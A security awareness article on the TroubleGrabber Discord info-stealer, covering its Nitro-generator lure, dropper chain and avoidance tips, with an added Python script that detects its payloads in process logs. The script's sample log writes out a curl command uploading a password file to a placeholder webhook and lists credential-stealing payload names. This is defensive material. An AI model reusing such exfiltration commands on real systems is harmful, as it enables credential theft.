An info-stealing malware called TroubleGrabber collects the login credentials, system information, and other data of Discord users, and keeps doing so until it is reported or deleted.
The cybersecurity company Sophos has issued a warning about TroubleGrabber, a malware found mostly on the Discord platform. According to the report, this communication platform has become an increasingly common target for malware creators and hackers in recent years.
Discord is a social platform used by gamers for private chats, text messages, file exchanges, and video/voice calls to facilitate their gaming sessions. Gamers like Discord for its highly flexible app and customizable features that help speed up their usual communication. Discord helps them organize content according to different hashtags, groups, categories, or rooms.
The biggest problem with Discord, however, is that the number of malware threats exploiting its popularity is growing. While Discord scams are nothing new, they are now becoming more invasive and spreading even faster than before. One such example is the TroubleGrabber malware.
TroubleGrabber was first discovered by researchers from Netskope at the end of 2020. It was later discovered that the developer who created the malware goes under the pseudonym Ithoublve, and has an email address, website, YouTube channel, and even a Facebook page under the same name! His Discord server has close to 600 members, and he hosts a malware generator on a public GitHub account that allows other hackers to use and contribute to his code.
TroubleGrabber is very reminiscent of the previously infamous AnarchyGrabber. However, thanks to a couple of distinctive functions it has, it can spread itself on Discord friend lists much more quickly. To make things worse, TroubleGrabber's creator has even created a YouTube tutorial video that is supposed to explain its use, helping the malware spread even faster.
Beware of the "free Nitro upgrade"
Many victims of this malware admitted opening the TroubleGrabber file because they were tricked into thinking it was a link to a gift code for a one-month Nitro upgrade on Discord. Keep in mind that Discord Nitro is a paid subscription, and that opening such links, as well as the regular use of cracks or cheat programs (called trainers), increases your risk of accidentally installing TroubleGrabber.
According to the researchers, TroubleGrabber mostly presents itself as some sort of game cheat, hack, or mod, and sometimes even as a Discord installer.
How to stay protected from TroubleGrabber malware?
The attack begins with the delivery of a Discord attachment or link to a target user. The link leads to an archive that contains an executable file. Both the attachment and the link pose as a legitimate app upgrade called Discord Nitro Generator. After the exe is executed, five additional payloads are dropped onto the compromised computer - Tokenstealer.bat, Tokenstealer.vbs, Curl.exe, Sendhookfile.exe, and WebBrowserPassView.exe.
Tokenstealer.bat coordinates the most harmful activities of this malware, while the remaining payloads harvest and save the victim's passwords, exfiltrate the data to the attacker's Discord server, and run cleanup routines to hide most of the traces. As the last step of the entire process, TroubleGrabber restarts the compromised device.
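The dropper chain described above lends itself to a simple host-side check. The following Python script is an added example, not code from the article or from Sophos or Netskope: it scans process-creation records for the five payload names the article lists and for the "Discord Nitro Generator" lure in the parent process. The log line format, the sample lines, the Temp paths, the PIDs and the webhook placeholder are all constructed for the demonstration; the exception for curl.exe under the Windows system directory reflects that current Windows builds ship a legitimate curl.exe there, so only copies running from elsewhere are flagged.

```python
"""Added example: flag TroubleGrabber payload activity in process-creation logs.

Not code from the original article or from Sophos/Netskope. The log format,
sample lines and paths below are constructed for this demonstration.
"""
import re
from dataclasses import dataclass
from typing import List

# Payload file names listed in the article, compared case-insensitively.
TROUBLEGRABBER_PAYLOADS = {
    "tokenstealer.bat",
    "tokenstealer.vbs",
    "curl.exe",
    "sendhookfile.exe",
    "webbrowserpassview.exe",
}

# The lure the article describes: the dropper poses as a Nitro generator.
LURE_PATTERN = re.compile(r"discord\s*nitro\s*generator", re.IGNORECASE)

# Constructed record format: "<timestamp> PID=<pid> PARENT=<parent path> CMD=<command line>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) PID=(?P<pid>\d+) PARENT=(?P<parent>.*?) CMD=(?P<cmd>.*)$"
)


@dataclass
class Finding:
    timestamp: str
    pid: int
    reason: str
    command: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path (quotes stripped)."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def image_path(cmd: str) -> str:
    """Executable path at the start of a command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    parts = cmd.split()
    return parts[0] if parts else ""


def in_windows_system_dir(path: str) -> bool:
    """True for the directories where Windows ships its own curl.exe (assumed layout)."""
    norm = path.replace("/", "\\").lower()
    return "\\windows\\system32\\" in norm or "\\windows\\syswow64\\" in norm


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per suspicious property of each process-creation record."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # constructed format only; unknown lines are skipped
        cmd, parent = m["cmd"], m["parent"]
        path = image_path(cmd)
        name = basename(path)
        reasons = []
        if name in TROUBLEGRABBER_PAYLOADS:
            # A curl.exe in the Windows system directory is the OS's own copy.
            if not (name == "curl.exe" and in_windows_system_dir(path)):
                reasons.append(f"known TroubleGrabber payload name: {name}")
        if basename(parent) in TROUBLEGRABBER_PAYLOADS:
            reasons.append(f"spawned by payload: {basename(parent)}")
        if LURE_PATTERN.search(parent) or LURE_PATTERN.search(cmd):
            reasons.append("Discord Nitro Generator lure in process chain")
        for reason in reasons:
            findings.append(Finding(m["ts"], int(m["pid"]), reason, cmd))
    return findings


def flagged_pids(text: str) -> List[int]:
    """Sorted, de-duplicated PIDs that produced at least one finding."""
    return sorted({f.pid for f in scan_log(text)})


# Constructed sample records: three payload launches, then two benign processes.
SAMPLE_LOG = """\
2020-11-10T18:02:11Z PID=4120 PARENT=C:\\Users\\alice\\Downloads\\Discord Nitro Generator.exe CMD="C:\\Users\\alice\\AppData\\Local\\Temp\\Tokenstealer.bat"
2020-11-10T18:02:12Z PID=4133 PARENT=C:\\Users\\alice\\AppData\\Local\\Temp\\Tokenstealer.bat CMD=C:\\Users\\alice\\AppData\\Local\\Temp\\WebBrowserPassView.exe
2020-11-10T18:02:13Z PID=4140 PARENT=C:\\Users\\alice\\AppData\\Local\\Temp\\Tokenstealer.bat CMD=C:\\Users\\alice\\AppData\\Local\\Temp\\curl.exe -F file=@pw.txt WEBHOOK_URL_PLACEHOLDER
2020-11-10T18:05:00Z PID=5001 PARENT=C:\\Windows\\explorer.exe CMD=C:\\Windows\\System32\\curl.exe --version
2020-11-10T18:06:00Z PID=5002 PARENT=C:\\Windows\\explorer.exe CMD="C:\\Users\\alice\\AppData\\Local\\Discord\\Update.exe" --processStart Discord.exe
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} pid={f.pid}: {f.reason}")
    print("flagged PIDs:", flagged_pids(SAMPLE_LOG))
```

Run against the constructed sample, the script flags the three payload launches (PIDs 4120, 4133 and 4140) and leaves the system curl.exe and the Discord updater alone. The file-name match is deliberately crude; in a real deployment the same logic would sit on top of Sysmon or EDR process-creation events, and the parent-process and lure checks are what keep a renamed payload from slipping past a pure name match.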
Admittedly, it can be very hard to distinguish between a genuine Discord installation file and a malicious one. To help you avoid TroubleGrabber, here is a reminder of some effective malware avoidance strategies.
TroubleGrabber avoidance dos:
- Use only the official Discord website to download the platform
- Use only the official Discord software installer for the upgrades
- Regularly update your Discord passwords
- Your Discord passwords should differ from all your other passwords
- Use very strong passwords for all your online accounts, including Discord
- Regularly update your OS and malware protection
- Try some of the best VPNs for Discord; most of them have built-in ad blockers and malware protection
TroubleGrabber avoidance don'ts:
- Never download Discord from a third-party website, only its official one
- Don't fall for "free Nitro generators"; Nitro is a paid subscription
- Never open anonymous or otherwise suspicious messages and links